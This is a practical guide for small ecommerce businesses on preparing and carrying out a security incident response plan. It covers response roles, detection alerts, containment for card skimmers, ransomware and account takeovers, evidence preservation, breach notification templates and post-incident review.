Security Incident Response Plan for Ecommerce: Prepare and Respond
Before You Start
The worst time to create an incident response plan is during an active incident. Store owners who discover a breach without a plan in place waste critical hours deciding what to do, who to call, and what steps to take, while the attacker continues extracting data. Studies consistently show that the time between breach detection and containment is the primary factor determining the total cost of an incident. IBM's Cost of a Data Breach Report found that organizations that contained a breach within 200 days paid an average of $3.93 million, while those that took longer than 200 days paid $4.95 million, a 23% increase driven entirely by response speed.
Your incident response plan does not need to be a 50-page document. For a small ecommerce store, a 2 to 3 page document covering your response team, emergency contacts, containment steps, and notification procedures is sufficient. The goal is having a clear, actionable reference that anyone on your team can follow when a crisis strikes, not creating a comprehensive security manual.
Step-by-Step Plan Creation
For a small ecommerce business, your "team" may be just you and one or two key contacts. The essential roles are: Incident Commander (you, the business owner, who makes decisions about taking the store offline, approving expenditures for forensic investigation, and authorizing customer communications), Technical Lead (the person who performs hands-on investigation and remediation, which may be you, your developer, or your hosting provider's support team), and Communications Lead (the person who handles customer notification, social media responses, and regulatory communications, which for small businesses is usually the owner). Build an emergency contact list that includes: your hosting provider's emergency support line (not the general support number), your payment processor's fraud or security team direct contact, a digital forensics firm that you have pre-vetted (get their business card and engagement terms before you need them, not during a crisis), a lawyer who handles data breach and privacy law (know their name and number in advance), your cyber insurance provider's claims line (if you have a policy), and law enforcement contacts (IC3.gov for the FBI's Internet Crime Complaint Center, and your local police department's cybercrime unit). Store this contact list printed in a physical location and digitally in a secure document accessible from a device other than your primary computer, in case your primary device is compromised.
You cannot respond to a breach you do not know about, and many ecommerce breaches go undetected for weeks or months. The median time to identify a breach is 204 days according to IBM's research, and every additional day of undetected compromise increases the damage. Set up multiple detection layers: Security plugin alerts from Wordfence, Sucuri, or MalCare that notify you of file changes, malware detections, brute force attacks, and suspicious activity. Google Search Console notifications for security issues detected on your site. Uptime monitoring through UptimeRobot (free) that alerts you to unexpected downtime. Payment processor alerts from Stripe, PayPal, or your gateway that notify you of unusual transaction patterns, chargeback spikes, or account security concerns. Customer reports by making it easy for customers to report security concerns through a visible contact method. Sometimes the first indication of a breach is a customer reporting that their account was used for unauthorized purchases or that they were redirected to an unfamiliar page. Configure all alerts to reach you via both email and SMS, so you are notified even if one channel is compromised or unavailable.
When you detect a potential breach, containment is your immediate priority. The goal is to stop the attacker's access and prevent further data loss while preserving evidence for investigation. Document these containment steps for the most common ecommerce incident types. For malware or card skimmer detected: Put your store in maintenance mode immediately to prevent customer exposure. Do not simply delete the malicious files, because the attacker likely has a backdoor that will reinfect within hours. Change all admin passwords from a clean device. Revoke all active admin sessions. Contact your payment processor to inform them of the potential card data compromise. For admin account compromise: Change the compromised account password immediately. Disable the account if possible. Review and revoke all active sessions. Check for new admin users the attacker may have created. Review recent file changes and plugin installations. Enable or re-enable two-factor authentication. For customer account takeover: Force password resets on affected accounts. Cancel unauthorized orders. Reverse unauthorized changes. Notify affected customers. For ransomware: Disconnect the affected server from the network immediately. Do not attempt to decrypt files yourself. Do not pay the ransom. Contact your forensics firm. Begin backup restoration planning.
After containment, you need to determine what happened, what data was affected, and how the attacker gained access. This information is necessary for fixing the vulnerability, fulfilling notification obligations, and potentially supporting law enforcement action. Preserve evidence before cleaning up: Make a complete image (copy) of the affected server or files before making any changes. Collect server access logs, application logs, database logs, and firewall logs for at least 90 days before the incident. Screenshot any evidence of the attack including unauthorized files, modified code, or suspicious admin accounts. Save email headers from any phishing messages that may have been the attack vector. Determine the scope: Identify when the compromise began by examining file modification timestamps and access logs. Determine what data was potentially accessed or exfiltrated by reviewing database query logs and outbound network traffic. Identify how many customers are potentially affected. Determine whether payment card data was exposed, which triggers additional notification requirements. For significant breaches (payment data exposed, large customer databases compromised, or regulatory notification likely required), engage a professional digital forensics firm. Their investigation produces a formal report that documents the attack, its scope, and the evidence, which is essential for regulatory compliance, insurance claims, and legal proceedings. Attempting to investigate a major breach without professional expertise often destroys evidence and produces incomplete or inaccurate conclusions.
Prepare notification materials before you need them. Having templates ready allows you to respond quickly during an incident rather than drafting communications under stress. Customer notification template should include: a clear description of what happened (without technical jargon), what personal data was potentially affected, what you are doing about it, what the customer should do (change their password, monitor their credit card statements, etc.), and how to contact you with questions. Use plain language and avoid minimizing the incident, customers respond better to honest, transparent communication than to corporate hedging. Regulatory notification template for GDPR (72-hour deadline) and applicable state breach notification laws should include: the nature of the breach, categories of data affected, approximate number of individuals affected, likely consequences, and measures taken to address the breach. Payment processor notification should be immediate if payment card data was potentially compromised, and should include the timeframe of the potential exposure and the number of potentially affected transactions. Recovery procedures should document step by step how to restore your store from backups, close the vulnerability that was exploited, verify the restored store is clean, and bring the store back online. Test these recovery procedures before you need them by performing a practice restoration in a staging environment.
Common Ecommerce Incident Scenarios
Scenario 1: Magecart card skimmer detected. A checkout page monitoring tool or customer report reveals that a malicious script is capturing card data on your checkout page. Response: immediately put the store in maintenance mode, contact your payment processor's security team, engage a forensics firm to determine when the skimmer was installed (this defines the window of affected transactions), prepare customer notifications for all customers who completed checkout during the compromise window, and file a report with your card brands through your payment processor. The card brands may require you to hire a PCI Forensic Investigator (PFI) for a formal investigation.
Scenario 2: Ransomware encrypts your store. You discover your store is displaying an error or ransom message instead of your products. Response: disconnect the server from the network, contact your hosting provider, do not pay the ransom, assess your backup status to determine if you have a clean restore point, provision a clean server, restore from the most recent clean backup, change all credentials, close the vulnerability that allowed the ransomware (typically an unpatched vulnerability or compromised credential), bring the store back online, and verify data integrity. If customer data may have been exfiltrated before encryption, follow your breach notification procedures.
Scenario 3: Customer reports unauthorized account access. A customer contacts you saying purchases were made on their account that they did not authorize. Response: immediately secure the affected account by forcing a password reset and revoking all sessions, cancel any unfulfilled unauthorized orders, refund the customer for any unauthorized completed orders, investigate whether this is an isolated account takeover or part of a broader credential stuffing attack by checking login logs for the same IP across multiple accounts. If multiple accounts are affected, force password resets for all potentially compromised accounts and notify affected customers.
After the Incident
After the immediate crisis is resolved, conduct a post-incident review within one week while details are fresh. Document: how the incident was detected and by whom, the timeline from detection to containment to resolution, what worked well in the response, what could have been done faster or better, what the root cause was and how it was remediated, and what changes to your security posture will prevent recurrence. Update your incident response plan based on what you learned. If a detection gap allowed the breach to go unnoticed, add monitoring for that attack type. If containment took too long because of unclear procedures, document clearer steps. If notification was delayed because templates were not ready, prepare them now.
Consider whether the incident reveals a systemic security gap that requires investment. A card skimmer incident might indicate you need regular vulnerability scanning and a quarterly security audit. A credential-stuffing attack might indicate you need bot detection and customer MFA. A ransomware incident almost certainly indicates you need better backup practices and server hardening. Use the incident as a catalyst for security improvements rather than a problem to forget once the immediate crisis is over.